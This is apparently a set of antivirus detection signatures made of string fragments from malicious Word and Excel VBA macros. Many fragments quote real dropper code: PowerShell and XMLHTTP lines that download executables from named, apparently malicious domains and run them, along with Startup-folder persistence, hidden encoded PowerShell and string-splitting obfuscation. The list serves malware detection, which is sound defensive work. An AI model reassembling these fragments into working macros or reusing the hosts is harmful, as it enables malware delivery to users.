 - linewhriter.WriteLine ("wscript //nologo c:\winlogs\debug.vbs http://ozcamlibel.com.tr/wp-content/uploads/2019/10/oklcnms.tiff c:\winlogs\oly_debug2.exe") (MACROHSTR_EXT)
 - VBA.CallByName VBA.CreateObject(Empty + "W" + Empty + "Sc" & Empty & "rip" & "t." & (MACROHSTR_EXT)
 - = Fer & Empty & "\ (MACROHSTR_EXT)
 -  & Empty & "\ (MACROHSTR_EXT)
 - ." & Empty & "c" & Empty & "m" & Empty & "d" (MACROHSTR_EXT)
 - Olerr Application.StartupPath (MACROHSTR_EXT)
 - = Environ("temp") & "\~$My_CV~" & "." & "ex" & "e" (MACROHSTR_EXT)
 - Set wshShell = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - wshShell.Run fp (MACROHSTR_EXT)
 - DM.createElement("tmp") (MACROHSTR_EXT)
 - DataType = "bin.base64" (MACROHSTR_EXT)
 - .ShellExecute (namerun) (MACROHSTR_EXT)
 - = Folder & Rnd & ".jse" (MACROHSTR_EXT)
 - Selection.Find.Execute Replace:=wdReplaceAll (MACROHSTR_EXT)
 - .CreateTextFile(savefile, True, True) (MACROHSTR_EXT)
 - = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") (MACROHSTR_EXT)
 - .Create(runfile, Null, Null, intProcessID) (MACROHSTR_EXT)
 - .sslblindado.com/ (MACROHSTR_EXT)
 - httphttps://transvale (MACROHSTR_EXT)
 - c:\NilWin\NilWint.bat", True) (MACROHSTR_EXT)
 - .CreateTextFile(" (MACROHSTR_EXT)
 - .CreateTextFile(Chr(99) & Chr(58) & Chr(92) & Chr(78) & Chr(105) & Chr(108) & Chr(87) & Chr(105) & Chr(110) & Chr(92) & Chr(78) & Chr(105) & Chr(108) & Chr(87) & Chr(105) & Chr(110) & Chr(116) & Chr(46) & Chr(118) & Chr(98) & Chr(115), True) (MACROHSTR_EXT)
 - DeleteFile = "c:\NilWin\NilWint.bat" (MACROHSTR_EXT)
 - c:\NilWin\NilWint.vbs (MACROHSTR_EXT)
 - & "\value." & Empty & "j" & "" & "se" (MACROHSTR_EXT)
 - ActiveDocument.Content.Text (MACROHSTR_EXT)
 -  & "." & "" & "App" & "" & "lica" & "" & "tion"), _ (MACROHSTR_EXT)
 - ).Value) Step 2 (MACROHSTR_EXT)
 - Application.StartupPath & TiionR(" (MACROHSTR_EXT)
 - \..\. (MACROHSTR_EXT)
 - ." & " (MACROHSTR_EXT)
 - \..") (MACROHSTR_EXT)
 - ChrW(CLng(((1.55555555555556 * (846 - 765#) (MACROHSTR_EXT)
 - -679 + 679.077497665733 (MACROHSTR_EXT)
 - ).SpawnInstance (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").RegWrite  (MACROHSTR_EXT)
 - \Microsoft\Windows\Start Menu\Programs\Startup\""+" + " (MACROHSTR_EXT)
 - " + "+"".exe" (MACROHSTR_EXT)
 - P\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs", True, True) (MACROHSTR_EXT)
 - RtCoolMom = RtCoolMom + 0.00000000105 * Sgn(1.88137155058 + 172402.036444808 * Assitents) (MACROHSTR_EXT)
 - WriteLine ("wscript //nologo c:\Colorfonts32\visitcard.vbs https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res c:\Colorfonts32\pes19.exe") (MACROHSTR_EXT)
 - .open(""GET"",""http:// (MACROHSTR_EXT)
 -  /ccc.js"",false);xml.send(); (MACROHSTR_EXT)
 - Environ(Replace("U###SE###RP###ROF###ILE", "###", "")) & "\" & Replace("D###ow###nl###oa###ds", "###", "") & "\BusinessLayer.js" (MACROHSTR_EXT)
 - JO = JO + 0.00001113107 * Atn(5.14987350142 + 3340.6124266998 * J) (MACROHSTR_EXT)
 - DeleteFile = "C:\programdata\Worid.bat" (MACROHSTR_EXT)
 - .CreateTextFile("C:\programdata\Worid.vbs", True) (MACROHSTR_EXT)
 - Environ("USERPROFILE") & "/ (MACROHSTR_EXT)
 - (Temp, "\") (MACROHSTR_EXT)
 - ActiveDocument.SaveAs FileName:="test_" & DocNum & ".doc" (MACROHSTR_EXT)
 - https://sx-facemask.com/wp-content/themes/busify/_Eb-6XZQPkeWFE2F0.php?x=MDAwMSCXfM02CmgQnk-DMmwZ6iqPCFHtzoeaRLfZrzLpiPzvIOSihDhzp9ISW4bpG92mmNuiHQNMEkLVrUmEz6koYzX70xVMGf6jVCqQeRVe7t85UJ6Q_r7oGwyZGzHnKZK1O-jzvCDYaZSg3VuYDRvD (MACROHSTR_EXT)
 - = "wscript.shell (MACROHSTR_EXT)
 - .Run$ payload (MACROHSTR_EXT)
 - suckmydickfornoreason9 = "p://%20%20@j.mp/ (MACROHSTR_EXT)
 - Dir(RootPath & "\22.mp4 (MACROHSTR_EXT)
 - Path & "\calc.dll (MACROHSTR_EXT)
 - ShellExecute("rund" & "ll32.exe" (MACROHSTR_EXT)
 - ntgs) & "Loc" & "al\Te" & "mp" (MACROHSTR_EXT)
 - fso.GetFolder(RootPath) (MACROHSTR_EXT)
 - ActiveDocument.Variables(" (MACROHSTR_EXT)
 - ").Value, (MACROHSTR_EXT)
 - .send (MACROHSTR_EXT)
 - .responseBody (MACROHSTR_EXT)
 - .savetofile (MACROHSTR_EXT)
 -  As String = "c:\programdata\ (MACROHSTR_EXT)
 - + "svr32 c:\programdata\ (MACROHSTR_EXT)
 - = 1 To Len(ActiveDocument.Variables(" (MACROHSTR_EXT)
 - ").Value) Step 2 (MACROHSTR_EXT)
 - & Mid(ActiveDocument.Variables(" (MACROHSTR_EXT)
 - ").Value,  (MACROHSTR_EXT)
 - new-objec" & "t" & " System.Net.WebClient;$client.DownloadFile('http://loisnfernandez.us/Gold/aafile.exe','" & "%" & "temp" & "%" & "\uqfeba.exe') (MACROHSTR_EXT)
 - start " & "%" & "temp" & "%" & "\uqfeba.exe" (MACROHSTR_EXT)
 - .FileExists(afedbbdecbcca + '/' + 'ebbabcbefeb.txt') (MACROHSTR_EXT)
 - WScript.Quit() (MACROHSTR_EXT)
 - .join('').replace('/*','') (MACROHSTR_EXT)
 - E).Get( (MACROHSTR_EXT)
 - E).SpawnInstance_ (MACROHSTR_EXT)
 - = new-objec" & "t" & " System.Net.WebClient;$client.DownloadFile('https://ines-arnshoff.de/ (MACROHSTR_EXT)
 - .exe','" & "%" & "temp" & "%" & (MACROHSTR_EXT)
 - start " & "%" & "temp" & "%" & "\ (MACROHSTR_EXT)
 - .pif" (MACROHSTR_EXT)
 - libstrore = libstrore + 0.1110765978 * Tan(3.96205090194 + 213.299095438 * T) (MACROHSTR_EXT)
 - SettingAttr.WriteLine ("start c:\Resources\REDclif.exe") (MACROHSTR_EXT)
 - (myUserForm1.Phone2.Caption) (MACROHSTR_EXT)
 - = "p://1" (MACROHSTR_EXT)
 - = "m32.ex" (MACROHSTR_EXT)
 - = "81." (MACROHSTR_EXT)
 - = "\zc" (MACROHSTR_EXT)
 - ").Value (MACROHSTR_EXT)
 - $ENv:teMp\ (MACROHSTR_EXT)
 - ." & Module1.M090 & " (MACROHSTR_EXT)
 - $ENv:tEMP\ (MACROHSTR_EXT)
 - ." & Module1.M090 (MACROHSTR_EXT)
 - Application.Run  (MACROHSTR_EXT)
 - = "t system.net.wEBclIen" & "T" & ")" (MACROHSTR_EXT)
 - echo wscript.sleep 3000 (MACROHSTR_EXT)
 - wscript.createobject("wscript.shell").run (MACROHSTR_EXT)
 - h""tt""p"":/""/newscambodia.serveblog.net/blog/%ComputerName%.doc (MACROHSTR_EXT)
 - C:\ProgramData\GET\g.vbs (MACROHSTR_EXT)
 - Q = Q + 0.40989414976 * Log(1.48302034194 + 26087.9031415742 * T) (MACROHSTR_EXT)
 - .CreateTextFile("c:\Resources\ (MACROHSTR_EXT)
 - .cmd", True) (MACROHSTR_EXT)
 - = Environ(str.Item(1)) & Chr(92) & Rnd & ".jse" (MACROHSTR_EXT)
 - UserForm1.Text.Caption (MACROHSTR_EXT)
 - = OSF.CreateTextFile(this_is_you, True, True) (MACROHSTR_EXT)
 - .ShellExecute this_is_you, "", "C" & ":\", "open", 1 (MACROHSTR_EXT)
 -  , 1), vbBinaryCompare)) (MACROHSTR_EXT)
 - = "" & Desaxop & "" & "\Gi." & "" & "j" & "" & "s" & "" & "e" (MACROHSTR_EXT)
 - & Empty & "\Tesla" & Empty (MACROHSTR_EXT)
 - Kiortnrr = Kiortnrr + 0.1110765978 * CSgn(3.96205090194 + 213.299095438 * J) (MACROHSTR_EXT)
 - Beometrick1.WriteLine ("start c:\Resources\REDclif.exe") (MACROHSTR_EXT)
 - myUserForm1.Phone.Caption) (MACROHSTR_EXT)
 - U7 = U7 - 0.00000000003 * Abs(0.82939608505 - 87253.177130155 * etcu1) (MACROHSTR_EXT)
 - SettingAttr.WriteLine ("start c:\LogsMouse\psico2.exe") (MACROHSTR_EXT)
 - ElevatedTrueFalse.TelNumber1.Caption (MACROHSTR_EXT)
 - .CreateTextFile("c:\LogsMouse\ (MACROHSTR_EXT)
 - Q = Q + 0.00034894275 * CInt(4.62610241759 + 12566.1516999828 * T) (MACROHSTR_EXT)
 - Set Beometrick1 = Beometrick.CreateTextFile("c:\Resources\ (MACROHSTR_EXT)
 - myUserForm1.Phone.Caption (MACROHSTR_EXT)
 - .WriteLine ("regsvr32 -s c:\Resources\REDclif.dll") (MACROHSTR_EXT)
 - = ParamSetting1.CreateTextFile("c:\Resources\ (MACROHSTR_EXT)
 -  .cmd", True) (MACROHSTR_EXT)
 - = CreateProcessA(0&, "c:\Resources\ (MACROHSTR_EXT)
 -  .cmd", 0&, 0&, 1&, _ (MACROHSTR_EXT)
 - = oProcess.Methods_(sHexDecode(" (MACROHSTR_EXT)
 - ")). _ (MACROHSTR_EXT)
 - tempPath = Environ("ALLUSERSPROFILE") & Chr(92) & Rnd & ".jse" (MACROHSTR_EXT)
 - objShellApp.ShellExecute tempPath (MACROHSTR_EXT)
 - If ActiveDocument.Path = "" Then (MACROHSTR_EXT)
 - .Cmd.Caption (MACROHSTR_EXT)
 - K7higm4W4E = K7higm4W4E & 6.50217347739 / QBColor(9.65617158663 & 26087.9031415742 / hgJOYU) (MACROHSTR_EXT)
 - .WriteLine (CreditBlank.PageDeposit.Caption) (MACROHSTR_EXT)
 - ActiveDocument.Tables( (MACROHSTR_EXT)
 - ).Cell( (MACROHSTR_EXT)
 - ).range.Text (MACROHSTR_EXT)
 - $ENv:public\ (MACROHSTR_EXT)
 - = "http:/" & (MACROHSTR_EXT)
 - 0.exe" (MACROHSTR_EXT)
 - file.writeline (TextBox1.Text) (MACROHSTR_EXT)
 - .FolderExists( (MACROHSTR_EXT)
 - & Chr(92) & Rnd & ".jse" (MACROHSTR_EXT)
 - .Replacement.Text = (MACROHSTR_EXT)
 - .Text = "([. (MACROHSTR_EXT)
 - CurDep = CurDep + 74.11132765978 * Ceil(3.96232532932194 + 213.2993295438 * GetBack) (MACROHSTR_EXT)
 - visitcmd.WriteLine (UserForm2.TravelIsland.Caption) (MACROHSTR_EXT)
 - .Value = WS.Cells( (MACROHSTR_EXT)
 - .xls").Close (MACROHSTR_EXT)
 - ToBase64 = .text (MACROHSTR_EXT)
 - (ActiveDocument.Variables(" (MACROHSTR_EXT)
 - ").Value), 0, True (MACROHSTR_EXT)
 - aaa_TouchMeNot_.txt (PEHSTR_EXT)
 - Application.Selection.InsertNewPage (MACROHSTR_EXT)
 - ActiveDocument.ActiveWindow.View.DisplayBackgrounds = False (MACROHSTR_EXT)
 - ActiveDocument.Range.Delete (MACROHSTR_EXT)
 - Ujdere Application.StartupPath (MACROHSTR_EXT)
 -  Selection.Find.Execute Replace:=wdReplaceAll, Forward:=True, Wrap:=wdFindContinue (MACROHSTR_EXT)
 - CallByName CreateObject(Redfty & "WSc" & Redfty & "r" & "" & "ip" & Redfty & "t." & Gtuyh0), _ (MACROHSTR_EXT)
 - CreateObject(Mid(mgs.CountPages.Page2.RunTextBox.Value, 9, 17)).ShellExecute thing (MACROHSTR_EXT)
 - = re.Start (MACROHSTR_EXT)
 - .Item().Document.Application.ShellExecute  (MACROHSTR_EXT)
 - If (Val(Application.Version)) Then (MACROHSTR_EXT)
 - SpecialPath = WshShell.SpecialFolders("Templates") (MACROHSTR_EXT)
 - .Open "get", (MACROHSTR_EXT)
 - = Benaj.CreateTextFile("c:\ (MACROHSTR_EXT)
 - \keyload (MACROHSTR_EXT)
 - start C:\1\WomanLove.exe (MACROHSTR_EXT)
 - = ActiveDocument.Variables("H").Value & Right(Left( (MACROHSTR_EXT)
 - 3z.fi/evil1/launcher.ps1" (MACROHSTR_EXT)
 - Open "GET", "https:// (MACROHSTR_EXT)
 - savetofile Environ("PUBLIC") & "\Documents\launcher.ps1 (MACROHSTR_EXT)
 - objWMIService.Get("Win32_ProcessStartup") (MACROHSTR_EXT)
 - powershell -executionpolicy remotesigned -File C:\Users\Public\Documents\launcher.ps1 (MACROHSTR_EXT)
 - = Environ("ALLUSERSPROFILE") & "\" & Rnd & ".js" (MACROHSTR_EXT)
 - .Create("wscript.exe " & p, Null, Null, intProcessID) (MACROHSTR_EXT)
 - Set objWMIService = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") (MACROHSTR_EXT)
 - CallByName VBA.CreateObject( (MACROHSTR_EXT)
 -  & "t." &  (MACROHSTR_EXT)
 - , ".txt", ".j" &  (MACROHSTR_EXT)
 -  & "\." & ".\..\" &  (MACROHSTR_EXT)
 -  & Empty & "\fdd." &  (MACROHSTR_EXT)
 - Application.StartupPath (MACROHSTR_EXT)
 - Call bc650879.exec(a779b2a8) (MACROHSTR_EXT)
 - c:\programdata\preview.jpeg (MACROHSTR_EXT)
 - db199cea.Open "GET", c4577dcf (MACROHSTR_EXT)
 - .Item().Document.Application.ShellExecute (MACROHSTR_EXT)
 - (Val(Application.Build) And  (MACROHSTR_EXT)
 - .Replace( (MACROHSTR_EXT)
 - VBA.CallByName  (MACROHSTR_EXT)
 - ", "/ (MACROHSTR_EXT)
 - paste.ee/r/v5e8E (MACROHSTR_EXT)
 - ht'+'tp:// (MACROHSTR_EXT)
 - Net.WebClient (MACROHSTR_EXT)
 - wershell -Command (MACROHSTR_EXT)
 - = ActiveDocument.Fields.Item( (MACROHSTR_EXT)
 - ).OLEFormat.Object.GroupName (MACROHSTR_EXT)
 - "C:\Windows\System32", Null, 0 * 1 (MACROHSTR_EXT)
 - = ActiveDocument.Paragraphs( (MACROHSTR_EXT)
 - ).Range.Text (MACROHSTR_EXT)
 - .Open "get", "https://rocktrade.alphacode.mobi/uploads/bin_Protected.exe", False (MACROHSTR_EXT)
 - + "IGZKGBI.exe" (MACROHSTR_EXT)
 - = CreateObject("SHELL.APPLICATION") (MACROHSTR_EXT)
 - & Chr(CLng(ActiveDocument.Variables(" (MACROHSTR_EXT)
 - ").Value & Right(Left( (MACROHSTR_EXT)
 - ystem.Net (MACROHSTR_EXT)
 - .WebClient)" (MACROHSTR_EXT)
 - .DownloadFi" (MACROHSTR_EXT)
 - webcenterbrasil.com.br/seo/vhf2. (MACROHSTR_EXT)
 - P" + "u" + "b" + "l" + "i" + "c%\Microsoft.e (MACROHSTR_EXT)
 - "ss '%P" + "u" + "b" + "l" + "i" + "c" + "%\M" + "i" + "c" + "r" + "o" + "s" + "o" + "f" + "t" + ".e (MACROHSTR_EXT)
 - & Chr(CInt(ActiveDocument.Variables(" (MACROHSTR_EXT)
 - ").Value &  (MACROHSTR_EXT)
 - c.top4top.io/p_1683q1xsh1.jpg" (MACROHSTR_EXT)
 - .Open "GET", "https:// (MACROHSTR_EXT)
 - .savetofile  (MACROHSTR_EXT)
 -  & "\avg.vbe" (MACROHSTR_EXT)
 - .Run "avg.vbe (MACROHSTR_EXT)
 - https://aperforrmingnextyou.xyz/ (MACROHSTR_EXT)
 - .dll (MACROHSTR_EXT)
 - C:\kfUofWj\ (MACROHSTR_EXT)
 - .dll DllRegisterServer (MACROHSTR_EXT)
 - xHttp.Open (MACROHSTR_EXT)
 - xHttp.Send (MACROHSTR_EXT)
 - Set objStartup = CreateObject("winmgmts:Win32_ProcessStartup") (MACROHSTR_EXT)
 - = oProcess.Methods_("Create"). _ (MACROHSTR_EXT)
 - At (p.Value) (MACROHSTR_EXT)
 - Worksheets(1).Activate (MACROHSTR_EXT)
 - .Caption =  (MACROHSTR_EXT)
 - .Tag =  (MACROHSTR_EXT)
 - .Tag For Binary As #1 (MACROHSTR_EXT)
 - .Tag <> "stage" Then (MACROHSTR_EXT)
 - .Caption <> "apple" Then Open  (MACROHSTR_EXT)
 - .Tag For Binary As #3 (MACROHSTR_EXT)
 - .Run "" +  (MACROHSTR_EXT)
 - %20%20@j.mp/love24242kada2r (MACROHSTR_EXT)
 - https" + "://%6786d78asd" + "%6786d78asd%" + "6786d78asd%6786d78asd@j.mp" +  (MACROHSTR_EXT)
 - %40%40%40%40%40%40@j.mp/asdghasd567asdgh" (MACROHSTR_EXT)
 - ta http:// (MACROHSTR_EXT)
 - %20%20@j.mp/ (MACROHSTR_EXT)
 - h" + "t" + "t" + "p" + "s" + ":" + "/" + "/" + "j" + "." + "m" + "p" + "/" + (MACROHSTR_EXT)
 - Mid(ActiveDocument.Paragraphs( (MACROHSTR_EXT)
 - 0).Range.Text & "", (MACROHSTR_EXT)
 - Mid(ThisDocument.Paragraphs( (MACROHSTR_EXT)
 -  ).Range.Text,  (MACROHSTR_EXT)
 - For Each prop In ActiveDocument.BuiltInDocumentProperties (MACROHSTR_EXT)
 - If prop.Name = " (MACROHSTR_EXT)
 - found_value = Mid(prop.Value,  (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
 - tmp_folder = fso.GetSpecialFolder(2) (MACROHSTR_EXT)
 - tmp_name = tmp_folder + "\" + fso.GetTempName() + ".cmd" (MACROHSTR_EXT)
 - Set f = fso.createTextFile(tmp_name) (MACROHSTR_EXT)
 - f.Write (orig_val) (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").Run tmp_name, 0 (MACROHSTR_EXT)
 - ThisDocument.Paragraphs( (MACROHSTR_EXT)
 - @).Range.Text (MACROHSTR_EXT)
 - = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main (MACROHSTR_EXT)
 - = Environ("TEMP") & "\powershdll.dll" (MACROHSTR_EXT)
 - { Invoke-WebRequest -useb http:// (MACROHSTR_EXT)
 - .ps1 } ^| iex;" (MACROHSTR_EXT)
 - Set er = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - er.Run x, bbb (MACROHSTR_EXT)
 - Rdfctu = PhIk(Prtcv_7, ".txt", "." & Trabtr & Bijnme & Trabtr & "e") (MACROHSTR_EXT)
 - Application.StartupPath & Knrft7 & "hh_9.2.1_" & Trabtr & ".txt" (MACROHSTR_EXT)
 - = CInt(ActiveDocument.Variables(" (MACROHSTR_EXT)
 - %").Value & Mid( (MACROHSTR_EXT)
 - = ActiveDocument.Variables(" (MACROHSTR_EXT)
 - %").Value (MACROHSTR_EXT)
 - ).Value: (MACROHSTR_EXT)
 - = Environ("USERPROFILE") & "\\" & Rnd & ".jse (MACROHSTR_EXT)
 - .ShellExecute someShe, "", "C:\", "open", 1 (MACROHSTR_EXT)
 - ThisDocument.Fields.Item( (MACROHSTR_EXT)
 - .Paragraphs( (MACROHSTR_EXT)
 - E).Range.Text (MACROHSTR_EXT)
 - C:\Windows\System32", Null, 0 * 1 (MACROHSTR_EXT)
 - U).Range.Text (MACROHSTR_EXT)
 - CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
 - ").Value: (MACROHSTR_EXT)
 - = Application.StartupPath & "\.." & "\..\" & "Redco" & 1 & JnRuy8 & ".blah (MACROHSTR_EXT)
 - = CallByName(CreateObject("Scripting.FileSystemObject"), "CreateT" & JnRuy8 & "extFile", VbMethod, Ikoltgi) (MACROHSTR_EXT)
 - get-icons.ddns.net/ (MACROHSTR_EXT)
 - P//autoindex.php (MACROHSTR_EXT)
 - .CreateTextFile(AppPaths + "\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs", True, True) (MACROHSTR_EXT)
 - ).Value) Then (MACROHSTR_EXT)
 - = ShellExecute(0, vbNullString, "net", "use (MACROHSTR_EXT)
 - & URL, "%windir%\system32", vbHide) (MACROHSTR_EXT)
 - lSuccess = ShellExecute(0, "Open", URL) (MACROHSTR_EXT)
 - Set objNetwork = CreateObject("WScript.Network") (MACROHSTR_EXT)
 -  * (Asc(Mid(ActiveDocument.Variables(" (MACROHSTR_EXT)
 -  ").Value,  (MACROHSTR_EXT)
 - <= Len(ActiveDocument.Variables(" (MACROHSTR_EXT)
 -  ").Value) Then (MACROHSTR_EXT)
 - Set objShell = CreateObject( (MACROHSTR_EXT)
 - objShell.Run ( (MACROHSTR_EXT)
 - .Caption) (MACROHSTR_EXT)
 - 'ExecCmd "C: (MACROHSTR_EXT)
 - p.exeSystem (MACROHSTR_EXT)
 - .", "System (MACROHSTR_EXT)
 - For Each p In ActiveWorkbook.BuiltinDocumentProperties (MACROHSTR_EXT)
 - At(p.Value) (MACROHSTR_EXT)
 - c = StrComp("Sycamore",y) (MACROHSTR_EXT)
 - exec = 'powershell.exe -nop -w Hidden -e (MACROHSTR_EXT)
 - Shell (exec) (MACROHSTR_EXT)
 - = CallByName(CreateObject(Dilnerc(" Wx Scx rix ptx. xSx hex xll ")), Dilnerc("Rx xun"), Frame1.Zoom - 99, Jilerdo, Frame1.Zoom - 99) (MACROHSTR_EXT)
 - = Environ("USERPROFILE") & "\" & Application.Name (MACROHSTR_EXT)
 - ).Value, super,  (MACROHSTR_EXT)
 - wsh.Exec (StrReverse(Str)) (MACROHSTR_EXT)
 - Set wsh = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - ").Comment.Text (MACROHSTR_EXT)
 - SaveToFile strMalwareFolder & "\" & strMalwareFilename, (MACROHSTR_EXT)
 - .Open "GET", strMalwareUrl, False (MACROHSTR_EXT)
 - strMalwareXorKey = malwaresXorKeyRange.Value (MACROHSTR_EXT)
 - Call Shell(strMalwareFolder & "\" & strMalwareFilename) (MACROHSTR_EXT)
 - .Exec (StrReverse(Str)) (MACROHSTR_EXT)
 - ").Comment.Text) (MACROHSTR_EXT)
 - = "h====t====t====p====:====/====/=" (MACROHSTR_EXT)
 - = CreateObject("" + "" + "W" + "" + "Sc" + "" + "r" + "ip" + "" + "t" + "." + "" + "S" + "h" + "el" + "" + "l") (MACROHSTR_EXT)
 - = "p" + "r" + "" + "oc" + "ex" + "" + "p" + "." + "e" + "" + "x" + "e" (MACROHSTR_EXT)
 - = "w" + "" + "ir" + "" + "es" + "har" + "" + "k" + "." + "ex" + "" + "e" (MACROHSTR_EXT)
 - + "." + "" + "ex" + "" + "e" + "" (MACROHSTR_EXT)
 - "St" + "" + "a" + "r" + "t" + " M" + "en" + "" + "u" + "\" + "Pr" + "" + "og" + "ra" + "ms" + "" + "\" + "St" + "ar" + "tu" + "" + "p" + "\" + """+  (MACROHSTR_EXT)
 -  +""" + "" + "." + "vb" + "" + "s" + "" (MACROHSTR_EXT)
 - GetObject("" + "wi" + "" + "nm" + "gm" + "" + "ts" + ":" + "/" + "/" & "." & "/" + "ro" + "" + "o" + "t" + "/" + "ci" + "" + "m" + "v2" + "" + "") (MACROHSTR_EXT)
 - http (MACROHSTR_EXT)
 - ://g2creditsolutions.com/trusty/ (MACROHSTR_EXT)
 -  .png (MACROHSTR_EXT)
 - c:\Users\Public\1.exe (MACROHSTR_EXT)
 - ://lorrainehomeconsulting.com/wp-content/uploads/ (MACROHSTR_EXT)
 -  /trusty/ (MACROHSTR_EXT)
 - = StrConv(ActiveDocument.Variables(" (MACROHSTR_EXT)
 -  = Application.StartupPath & (MACROHSTR_EXT)
 - Wicmd.CreateFolder "C:\pic1\" (MACROHSTR_EXT)
 - = "C:\pic1\Build16.cmd" (MACROHSTR_EXT)
 - "start c:\pic1\ (MACROHSTR_EXT)
 - PreviewPreview2.exe" (MACROHSTR_EXT)
 - ;quui()fmjGebpmoxpE/*uofjmDcfX/ufO!udfkcP.xfO)##!eobnnpD.!mmfitsfxpq") ' R (MACROHSTR_EXT)
 - !U0!Z!E0!O0!Z!D0!fdjpid!D0!fyf/end]34nfutzT]txpeojX];D") (MACROHSTR_EXT)
 - & ts("*(f(!,!(yf/o(!,!(ph(!,!(pmo(!,!(jx]sjeq(!,!(nu](!,!(djm(!,!(cv(!,!(Q]t(!,!(sft(!,!(V](!,!(;D(!-(") (MACROHSTR_EXT)
 - ", "." &  (MACROHSTR_EXT)
 -  & "js" &  (MACROHSTR_EXT)
 - Gjurv_tr Application.StartupPath, "\." & ".\." & ".\..\" (MACROHSTR_EXT)
 - = "https:// (MACROHSTR_EXT)
 - %/lsass.exe" (MACROHSTR_EXT)
 - l = ActiveDocument.Path + "\lsass.exe" (MACROHSTR_EXT)
 - = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
 - ).Comment.Text (MACROHSTR_EXT)
 - ).Comment.Text) (MACROHSTR_EXT)
 - .Exec (StrReverse( (MACROHSTR_EXT)
 -  http (MACROHSTR_EXT)
 - P/trusty/ (MACROHSTR_EXT)
 - 0.png (MACROHSTR_EXT)
 - c:\Users\Public\ (MACROHSTR_EXT)
 - .Methods_("Create"). _ (MACROHSTR_EXT)
 - InParameters.SpawnInstance_ (MACROHSTR_EXT)
 - FieldStr = Split(Tmp, "///") (MACROHSTR_EXT)
 - = oProcess.ExecMethod_(sHexDecode(" (MACROHSTR_EXT)
 -  = ActiveDocument.Variables(" (MACROHSTR_EXT)
 - Filename = Filename & "\RUN_S.BAT" (MACROHSTR_EXT)
 - Set ages = CreateObject("Shell.Application") (MACROHSTR_EXT)
 - ages.ShellExecute (kola) (MACROHSTR_EXT)
 - name = "\\" & name & ".jse (MACROHSTR_EXT)
 - = "do shell script " & Chr$(34) & "open -a Safari " & URL & Chr$(34) (MACROHSTR_EXT)
 - = ShellExecute(0, "Open", URL) (MACROHSTR_EXT)
 - = "do shell script " & Chr$(34) & "/usr/bin/curl --url " & URL & Chr$(34) (MACROHSTR_EXT)
 - " & URL, "%windir%\system32", vbHide) (MACROHSTR_EXT)
 - Set A = fs.CreateTextFile("c:\Scene1\LogScene (MACROHSTR_EXT)
 - A.WriteLine (CStr(wmiSeria2.lblFAQscene1.Caption)) (MACROHSTR_EXT)
 - LoadBytesFunc "c:\Scene1\LogScene1.cmd", vbNullString, 1, 0 (MACROHSTR_EXT)
 - ://www.emojiforoutlook.com/Emoji/Versions/" & WebVersionName (MACROHSTR_EXT)
 - WinHttpReq.Open "GET", myURL, False (MACROHSTR_EXT)
 - oStream.SaveToFile (Environ("UserProfile") & "\Downloads\" & WebVersionName) (MACROHSTR_EXT)
 - .CreateFolder "c:\1" (MACROHSTR_EXT)
 - Benaj.CreateTextFile("c:\1\SINGAPOUR.cmd" (MACROHSTR_EXT)
 - Benaj.CreateTextFile("c:\1\FRANCE.cmd" (MACROHSTR_EXT)
 - Architecture.WriteLine ("break>%FolderVBS%") (MACROHSTR_EXT)
 - ("start c:\1\WomanLove.exe") (MACROHSTR_EXT)
 - Str = "{12}{16}{15}{21}{14}{9}{20}{10}{7}{19}{22}{1}{6}{3}{2}{17}{4}{23}{13}{0}{24}{25}{11}{8}{5}{18};.(UCA{1} (MACROHSTR_EXT)
 - settler = "CMD.Exe (MACROHSTR_EXT)
 - Function commde() (MACROHSTR_EXT)
 - AndPlus = settler + doublecheck + formsands + cleardatas + commde + crsss (MACROHSTR_EXT)
 - = CreateObject("WScript.Shel" & "l") (MACROHSTR_EXT)
 - enbmggr.Run (MACROHSTR_EXT)
 - lulu.breful.us/ (MACROHSTR_EXT)
 - mi.ceceliansanders.us/ (MACROHSTR_EXT)
 - gali.keipta.us/ (MACROHSTR_EXT)
 - %temp%\ (MACROHSTR_EXT)
 - (.exe');start %temp% (MACROHSTR_EXT)
 - obj.Document.Application.ShellExecute "cmd.exe ", "/c " & " " (MACROHSTR_EXT)
 - VBA.Command( (MACROHSTR_EXT)
 - CreateFileA("C:\Jeropit\Poteri.BAT (MACROHSTR_EXT)
 - Htyu\Bioper\Derip (MACROHSTR_EXT)
 - docNew.Activate (MACROHSTR_EXT)
 - das = Replace("SystemComponentModelTypeDescriptorTypeDescriptorInterfaceshttp://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "SystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "") (MACROHSTR_EXT)
 - sas = Replace("mNetChunkParserReadStateqSystemComponentModelDesignStandardCommandsVSStandardCommandsE.emNetChunkParserReadStateqxe", "mNetChunkParserReadStateq", "") (MACROHSTR_EXT)
 - CreateFileW(StrPtr("C:\FMKSJEU\ (MACROHSTR_EXT)
 - .BAT") (MACROHSTR_EXT)
 - wscript C:\FMKSJEU\ (MACROHSTR_EXT)
 - .JSE" (MACROHSTR_EXT)
 - Set docNew = Documents.Add(strTemplateName) (MACROHSTR_EXT)
 - (" aW aSc ari apt a" & " a.Sh ael al")) (MACROHSTR_EXT)
 - .Caption = FiNerty("Ru an") (MACROHSTR_EXT)
 - Application.StartupPath & "\..\..\..\..\.." (MACROHSTR_EXT)
 - Me.Name &  (MACROHSTR_EXT)
 -  & ".txttxttxt." (MACROHSTR_EXT)
 - a-z0-9").Value (MACROHSTR_EXT)
 - a-z0-9").Value & Mid( (MACROHSTR_EXT)
 - ExecCmd(cmdline As String) (MACROHSTR_EXT)
 - ExecCmd "C:\ (MACROHSTR_EXT)
 - .BAT" (MACROHSTR_EXT)
 - paypeted.com/ (MACROHSTR_EXT)
 - http://sulainul.com/ (MACROHSTR_EXT)
 - http://vonty.best/ (MACROHSTR_EXT)
